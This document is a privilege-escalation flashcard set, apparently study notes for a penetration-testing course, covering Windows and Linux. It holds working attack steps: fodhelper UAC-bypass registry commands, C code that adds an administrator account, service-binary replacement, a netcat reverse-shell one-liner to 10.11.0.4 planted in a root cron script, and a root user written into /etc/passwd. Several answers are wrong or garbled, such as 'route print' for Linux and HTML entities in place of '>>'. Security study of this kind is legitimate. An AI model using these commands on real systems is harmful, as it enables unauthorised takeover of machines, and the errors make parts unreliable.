Privilege Escalation

Question 1

What is the process for enumerating users on a Windows machine?

Answer 1

1. whoami
2. net user
   - - gains additional information about the user you are logged in with
3. net users
   - - discover other user accounts on the system

Question 2

What is the process for enumerating users on a Linux machine?

Answer 2

1. whoami
2. id
3. cat /etc/passwd
   - - enumerates other users on the system

Question 3

How do you enumerate the Operating System Version and Architecture on a Windows machine?

Answer 3

c:> systeminfo | findstr /B /C:”OS Name” /C:”OS Version” /C:”System Type”

Question 4

How do you enumerate the Operating System Version and Architecture on a Linux machine?

Answer 4

• • cat /etc/issue
• • cat /etc/*-release
• • uname -a

Question 5

How do you list running processes on a Windows machine?

Answer 5

tasklist /SVC

Question 6

How do you list running processes on a Linux machine?

Answer 6

ps axu

Question 7

How do you enumerate all TCP/IP network configurations on a Windows machine?

Answer 7

ipconfig /all

Question 8

How do you enumerate all TCP/IP network configurations on a Linux machine?

Answer 8

route print

Question 9

How do you list active network connections on a Windows machine?

Answer 9

netstat -ano

Question 10

How do you list active network connections on a Linux machine?

Answer 10

• ifconfig
• ip a
• /sbin/route
• ss -anp

Question 11

How do you enumerate firewall settings on a Windows system?

Answer 11

• • netsh advfirewall show currentprofile

- - netsh advfirewall firewall show rull name=all

Question 12

How do we enumerate Scheduled Tasks on a Windows system?

Answer 12

– schtasks /query /fo LIST /v

Question 13

How do we enumerate Scheduled Tasks on a Linux system?

Answer 13

• • ls -lah /etc/cron*

- - cat /etc/crontab

Question 14

How do we enumerate Installed Applications on a Windows machine?

Answer 14

– wmic product get name, version, vendor

Question 15

How do we enumerate Patch Levels and Patch Levels on a Windows machine?

Answer 15

– wmic qfe get Caption, Description, HotFixID, InstalledOn

Question 16

How do we enumerate Installed Applications on a Windows machine?

Answer 16

dpkg -l

Question 17

On a Windows machine, how would you search for any file or directory in the Program Files directory that allows the ‘Everyone’ group ‘write’ permissions?

Answer 17

– accesschk.exe -uws “Everyone” “C:\Program Files”

Question 18

What PowerShell cmdlet retrieves all permissions for a given file or directory?

Answer 18

Get-Acl

Question 19

What additional cmdlet needs to be used with Get-Acl to run recursively?

Answer 19

Get-ChildItem

Question 20

How would we use Get-Acl and Get-ChildItem cmdlets to get every file and directory under the Program Files directory that allows the ‘Everyone’ group to modify?

Answer 20

Get-ChildItem “C:\Program Files” -Recurse | Get-ACL | ?{$_.AccessToString -match “Everyone\sAllow\s\sModify”}

Question 21

In Linux, how do you find every directory writable by the current user on the target system?

Answer 21

find / -writable -type d 2>/dev/null

Question 22

How do you enumerate Unmounted Disks on a Windows machine?

Answer 22

• mountvol

Question 23

How do we enumerate Unmounted Disks on a Linux machine?

Answer 23

• cat /etc/fstab
• mount
• /bin/lsblk

Question 24

What are Device Drivers?

Answer 24

-A ‘driver’ is a software component that lets the operating system and a device communicate with each other.

Question 25

In Windows, how can you enumerate Device Drivers and Kernel Modules?

Answer 25

• • C:>powershell

- - PS C:> driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object ‘Display Name’, ‘Start Mode’, Path

Question 26

In Windows, how can we get a list of Loaded Drivers?

Answer 26

• We can use the Get-WmiObject cmdlet to get the Win32_PnPSignedDriver WMI instance, which provides digital signature information about the drivers
• • Get-WmiObject Win32 PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like “VMware”}

Question 27

How can we enumerate the Loaded Kernel Modules?

Answer 27

– lsmod

Question 28

How can we find out more information about a specific Kernel Module in Linux? (Ex. ‘libata’ Kernel Module)

Answer 28

– /sbin/modinfo libata

Question 29

On Windows systems, which registry setting should be checked on which registries for a “privesc shortcut”?
Why and How?

Answer 29

• On Windows systems, we should check the status of the ‘AlwaysInstallElevated’ registry setting
• If this key is set to ‘1’ (enabled) in either HKEY_CURRENT_USER or HKEY_LOCAL_MACHINE, any user can run Windows Installer packages with Elevated Privileges.
• We can use ‘reg query’ to check these settings:
• • C:> reg query HKEY_CURRENT_USER\Software\Policies \Microsoft\Windows\Installer
• • C:> reg query HKEY_LOCAL_MACHINE\Software\Policies \Microsoft\Windows\Installer

Question 30

In Linux, what should we search for to see if we can get files to run as the ‘root’ user? How is this located?

Answer 30

• SUID files
• if the SUID permission is set on a binary it will run with the permissions of the file owner
• if a binary has the SUID bit set and the file is owned by ‘root’, any local user will be able to execute that binary with elevated privileges
• • find / -perm -u=s -type f 2>/dev/null

Question 31

What is an automated tool to check for Windows privesc vulnerabilities? what command will provide all privesc vulns and groups?

Answer 31

• windows-privesc-check

- - C:> windows-privesc-check2.exe –dump -G

Question 32

What is an automated tool to check for Linux privesc vulnerabilities?

Answer 32

• unix-privesc-check

Question 33

How are privileges managed on Windows?

Answer 33

• Once a user is authenticated, Windows generates an access token that is assigned to that user
• The token itself contains various pieces of information that effectively describe the security context of a given user, including privileges
• Access tokens what are assigned a ‘security identifier’(SID)

Question 34

In addition to privileges, what has Windows implemented to assign trust levels to application processes and securable objects? What are the levels?

Answer 34

• Integrity Levels
• This describes the level of trust the operating system has in running applications or securable objects
• The configured Integrity Level dictates what actions an application can perform, including the ability to read or write to the local file system
• There are four Integrity Levels:
• • System Integrity Process: System rights
• • High Integrity Process: Administrative rights
• • Medium Integrity Process: Standard user rights
• • Low Integrity Process: very restricted rights often used in sandboxed processes

Question 35

What Windows command displays Integrity Levels in action?

Answer 35

– c:> whoami /groups

Question 36

What security tokens does an Administrative user have, and what mechanism acts as a separation between those two Integrity Levels?

Answer 36

• The Administrative user has two security tokens:
• • medium integrity level token
• • high integrity level token
• UAC acts as the separation mechanism between those two integrity levels

Question 37

Explain UAC

Answer 37

• User Account Control
• Forces applications and tasks to run in the context of a non-administrative account until an Administrator authorizes elevated access
• UAC will block installers and unauthorized applications from running without the permissions of an administrative account
• Two UAC modes:
• • credential prompt
• • consent prompt

Question 38

When does a UAC Credential Prompt get triggered?

Answer 38

• When a standard user wishes to perform an administrative task, such as installing a new application
• The credentials of an Administrative User will be required to complete the install

Question 39

When does a UAC Consent Prompt get triggered?

Answer 39

• When a administrative user wishes to perform an administrative task
• The administrative user simply has to confirm that the task should be completed

Question 40

Why would an administrative user be blocked from changing their password in a cmd prompt?

Answer 40

• Because UAC is enabled and the CMD terminal is running with the administrative users medium integrity level token

Question 41

UAC Bypass Exploit

Answer 41

• Windows 10 build 1709
• Leverages a UAC bypass based on fodhelper.exe
• This application is launched whenever a local user selects the “Manage optional features” option in the “Apps & Features” Windows Settings screen
• • C:> \windows\System32\fodhelper.exe
• -

Question 42

How can you get information about an application, such as required permissions to run and whether the application autoEvelavtes privileges?

Answer 42

• The Application Manifest is an XML file containing information that lets the operating system know how to handle the program when it is started.
• We can inspect the manifest with the ‘sigcheck’ utility from ‘Sysinternals’
• • C:> cd C:\Tools\Privilege_escalation\ SysinternalsSuite
• • C:\Sysin..> sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe

Question 43

When viewing the Application Manifest for an application, how do you know if the executable can auto-elevate to ‘high integrity’ w/o UAC prompt?

Answer 43

• the ‘autoElevate’ flag is set to ‘True’

Question 44

How do you use Procmon to analyze an application such as ‘fodhelper.exe’?

Answer 44

1. Run procmon.exe (sysinternals)
2. Filter on process named ‘fodhelper.exe’
3. Run ‘fodhelper.exe’
4. Filter on ‘Result’ value of ‘NAME NOT FOUND’, which shows ‘fodhelper.exe’ attempting to access registry keys that do not exist.
5. Focus on registry that we, as the current user, can control (HKEY_CURRENT_USER)(HKCU); Filter on ‘Path’ contains ‘HKCU’
6. We see that ‘fodhelper.exe’ is trying to access HKCU:\Software\Classes\ms-setting\open\command registry key, which does not appear to exist.

Question 45

Explain the ‘fodhelper.exe’ exploit

Answer 45

1. Attempts to access ‘HKCU:\Software\Classes\ms-setting\open\command’ registry, but gets a ‘NAME NOT FOUND’ result (procmon)
2. When it fails above, it next tries to access the same key in HKEY_CLASSES_ROOT
3. Let’s add the registry to HKCU instead:
   - - C:> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
4. Rerunning ‘fodhelper.exe’ in procmon, we see that attempts to query a value ‘DelegateExecute’ stored in HKCU
5. Next, we add ‘DelegateExecute’ entry to our registry:
   - - C:> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
6. Now, we see that ‘fodhelper.exe’ has a SUCCESS result (procmon) and finds the new ‘DelegateExecute’ entry, but finds an empty (Default) value
7. Finally, let’s replace the empty (Default) value with cmd.exe
   - - C:> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d “cmd.exe” /f
8. Running ‘fodhelper.exe’ now results in a CMD shell with admin access (high-integrity token) and we have bypassed UAC

Question 46

How can you make a Registry entry execute a program, such as cmd.exe?

Answer 46

• Setting the ‘DelegateExecute’ key value to an empty value (REG_SZ) and then setting it to cmd.exe
• • C:> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
• • C:> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d “cmd.exe” /f

Question 47

How are Insecure File Permissions exploited?

Answer 47

1. Program runs as a Windows service
2. During install, the program receives full read write access to all members of the Everyone group
3. The program is replaced with a malicious file
4. The service is restarted and the malicious file is executed with SYSTEM privileges

Question 48

What is a directory to look in for possible Insecure File Permission exploits?

Answer 48

• Program Files

- These services are user-installed, and have a potential to be installed with elevated privileges

Question 49

What PowerShell one-liner allows you to list the name of ‘running’ services and the Path where they are installed?

Answer 49

PS C:> Get-WmiObject win32-service | Select-Object Name, State, PathName | Where-Object {$_.State -like ‘Running’}

Question 50

What is ‘icacls’?

Answer 50

• Windows utility that outputs the Security Identifiers (SIDs) followed by a permission mask
• • C:> icacls “C:\Program Files\Serviio\bin\ServiioService.exe”

Question 51

What are the ‘icacls’ permission masks?

Answer 51

• F = Full Access
• M = Modify Access
• RX = Read and execute access
• R = Read-only access
• W = Write-only access

Question 52

After running ‘icacls’ on ServiioSerice.exe, you see it has the following permission, what can you do to exploit this?
- BUILTIN\Users:(I)(F)

Answer 52

• Any user (BUILTIN\Users) has Full-Access
• We can replace ServiioService.exe with our own malicious binary
• We can then reboot the service and execute our malicious binary

Question 53

How would you create a malicious binary file named ‘adduser.exe’ that creates a user named ‘evil’ and adds this user to the ‘administrators’ group?

How would you replace the existing ServiioService.exe with ‘adduser.exe’?

How would you get ‘adduser.exe’ to execute?

Answer 53

1. ## Create a ‘C’ file ‘adduser.c’ with the following code:#include

int main ()
{
   int i;

i = system (“net user evil Ev!lpass /add”);
i = system (“net localgroup administrators evil /add”);

return 0;
}
———————————–
2. Cross-compile the code on our Kali machine with ‘i686-w64-mingw32-gcc’ with -o to specify the name of the compiled output:
– kali:~$ i686-w64-mingw32-gcc adduser.c -o adduser.exe
3. Transfer ‘adduser.exe’ to our target and replace ‘ServiioService.exe’
– C:> move “C:\Program Files\Serviio\bin\ServiioService.exe’ “C:\Program Files\Serviio\bin\ServiioService_original.exe”
– C:> move adduser.exe “C:\Program Files\Serviio\bin\ServiioService.exe”
4. Restart the Serviio service
– C:> net stop Serviio
– C:> net start Serviio

Question 54

In Windows, how can we tell if a service (ex. Serviio) will restart on a reboot?

Answer 54

• If the ‘startmode’ value is ‘Auto’ is will automatically start on a reboot
• • C:> wmic service where caption=”Serviio” get name, caption, state, startmode

Question 55

In Windows, how can you tell if your user has permission to reboot the system?

Answer 55

• If the user has the privilege ‘SeShutdownPrivilege’

- - C:> whoami /priv

Question 56

In Windows, how to you reboot the system?

Answer 56

C:> shutdown /r /t 0

Question 57

When do you try to take advantage of Unquoted Service Paths?

Answer 57

• when we have write permissions to a service’s main directory and subdirectories, but cannot replace files within them
• Each Windows service maps to an executable file that will be run when the service is started.
• Most of the time, services that accompany third party software are stored under the C:\Program Files directory

Question 58

Exploiting Unquoted Service Paths

Answer 58

• when using file or directory paths that contain spaces, the developers should always ensure that they are enclosed by quotation marks
• this ensures that they are explicitly declared
• However, when this is not the case and a path is unquoted, it is open to interpretation
• Specifically, in the case of executable paths, anything that comes after each whitespace character will be treated as a potential argument or option for the executable

Question 59

How will Windows attempt to run the executable service.exe from the path C:\Program Files\My Program\My Service\service.exe?

Answer 59

1. C:\Program.exe
2. C:\Program Files\My.exe
3. C:\Program Files\My Program\My.exe
4. C:\Program Files\My Program\My Service\service.exe

Question 60

How would you try to exploit the Unquoted Service Path vulnerability in the path C:\Program Files\My Program\My Service\service.exe? What would be the ideal outcome?

Answer 60

• Place a malicious executable named ‘My.exe’ in either the ‘C:\Program Files\My Program’ directory or ‘C:\Program Files\My Program\My Service’ directory.
• The ideal outcome would be when the service runs, it should execute the malicious ‘My.exe’ with the same privileges that the service starts with
• Often, these privileges are the NT\System account, which would result in a successful privilege escalation attack

Question 61

What is something important to keep in mind when exploiting Windows Kernel vulnerabilities?

Answer 61

• When attempting to exploit system-level software (such as drivers or the kernel itself), we must pay careful attention to several factors:
• • the target’s OS
• • version
• • architecture
• Failure to accurately identify these factors can trigger a BSOD

Question 62

What attack surface should be investigated first when attempting to exploit Windows Kernel vulnerabilities?

Answer 62

• Third-party driver exploits are more common, and as such, we should always attempt to investigate this attack surface first
• Native kernel vulnerabilities are less common and more difficult to exploit

Question 63

What command displays the Windows OS version and architecture?

Answer 63

– C:> systeminfo | findstr /B /C:”OS Name” /C:”OS Version” /C:”System Type”

Question 64

What command displays the Windows OS drivers?

Answer 64

• • C:> driverquery /v

* ** This output primarily consists of typical Microsoft-installed drivers and third party drivers

Question 65

If you are trying to get version information about a program, such as USBPcap, what command should you use?

Answer 65

– C:> type USBPcap.inf

Question 66

How do we enumerate Windows Kernel vulnerabilities?

Answer 66

1. Find the OS version and architecture
   – C:> systeminfo | findstr /B /C:”OS Name” /C:”OS Version” /C:”System Type”
2. Enumerate the drivers that are installed on the system
   – C:> driverquery /v
3. Query ‘searchsploit’ for any exploits for third party drivers discovered, looking specifically for exploits that match the driver version number
   4.

Question 67

What programming language are most exploits that target kernel-level vulnerabilities written in?
How does this impact exploit development?

Answer 67

• the vast majority of exploits targeting kernel-level vulnerabilities are written in a low-level programming language such as C or C++
• therefore, exploits must be compiled
• ideally, we want to compile code on the platform version we are attacking, and should spin up a VM that matches our target, and compile the code there
• However, we can also cross-compile the code on an operating system entirely different from the one we are targeting

Question 68

If our target Windows machine has ‘mingw-w64.bat’ installed, how can we create an executable compiled to run on this machine? Assume the example exploit is ‘41542.c’

Answer 68

1. Run the ‘mingw-w64.bat script that sets up the PATH env variable for the ‘gcc’ executable
   - - C:> mingw-w64.bat
2. Run gcc to make sure it is working properly
   - - C:> gcc -help
3. Transfer the exploit code to the Windows client and compile it
   - - C:> gcc 41542.c -o exploit.exe
   * ** May get warnings, but still works ***
4. Run malicious executable

Question 69

What characteristics of a file on a Linux system do we look for to exploit Insecure File Permissions?

Answer 69

• an executable file
• allows us write access
• runs at an elevated privilege level

Question 70

What is a prime target on Linux systems for exploiting Insecure File Permissions?

Answer 70

• the ‘cron’ time-based job scheduler
• system-level jobs are executed with root user privileges and system admins often create scripts for cron jobs with insecure permissions

Question 71

Where should we look for installed cron jobs on a Linux system?

Answer 71

• • ls -lah /etc/cron*
• • cat /etc/crontab
• • grep “CRON” /var/log/cron.log

Question 72

Given a CRON job that executes a script ‘/var/scripts/user_backup.sh’ that runs with root privileges, how would we determine if local (low-level) users have write permissions to the script?

Answer 72

– ls -lah /var/scripts/user_backups.sh

Question 73

What is the reverse shell one-liner to add to scripts in linux when exploiting Insecure File permissions?

Answer 73

• • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f| /bin/sh -i 2>&1|nc 10.11.0.4 1234 >/tmp/f
• rm /tmp/f = removes any existing named pipes
• mkfifo /tmp/f = creates a named pipe
• cat /tmp/f|/bin/sh -i = creates an interactive shell on the local machine and hooks the output of the pipe to the shell’s input
• 2>&1|nc 10.11.0.4 1234 = takes the output of the shell and sends it over the network to a machine listening on port 1234 at 10.11.0.4
• > /tmp/f = takes the output of ‘nc’ and sends it to the named pipe’s input, where it becomes input for the shell

Question 74

Given an existing script ‘user_backups.sh’, how would you write a reverse shell one-liner to it so it will connect to an attacking machine at 10.11.0.4 on 1234 when ‘user_backups.sh’ is run by the CRON job?

Answer 74

– echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f| /bin/sh -i 2>&1|nc 10.11.0.4 1234 >/tmp/f”&raquo_space; user_backups.sh

Question 75

How can /etc/passwd be used to exploit Insecure File Permissions in Linux?

Answer 75

• Linux passwords are stored in /etc/shadow
• password hashes are stored in /etc/passwd
• If a password hash is present in the second column of a /etc/passwd user record, it is considered valid for authentication and takes precedence over the respective entry in /etc/shadow
• ## This means that if we can write into the /etc/passwd file, we can effectively set an arbitrary password for any account

Question 76

On Linux, what algorithm is used to generate password hashes?

Answer 76

• crypt algorithm

Question 77

Give an example of how to exploit Insecure File Permissions in Linux by creating a root user named ‘root2’ that is apart of the ‘root’ group

Answer 77

1. Generate the password hash for ‘evil’
   - - openssl passwd evil
2. Write the generated password hash to the /etc/passwd file for the user ‘root2’ and add to the ‘root’ user group
   - - echo “root2:AD24fcSx2Il3I:0:0:root:/root:/bin/bash”&raquo_space; /etc/passwd

Question 78

What are the commands you should run to enumerate kernel vulnerabilities on a Linux machine?

Answer 78

• • cat /etc/issue
• • uname -r
• • searchsploit linux kernel
• ** EX: searchsploit linux kernel Ubuntu 16.04 ***

Question 79

Given the exploit ‘43418.c’ how would you compile it to run on Linux?

Answer 79

– gcc 43418.c -o exploit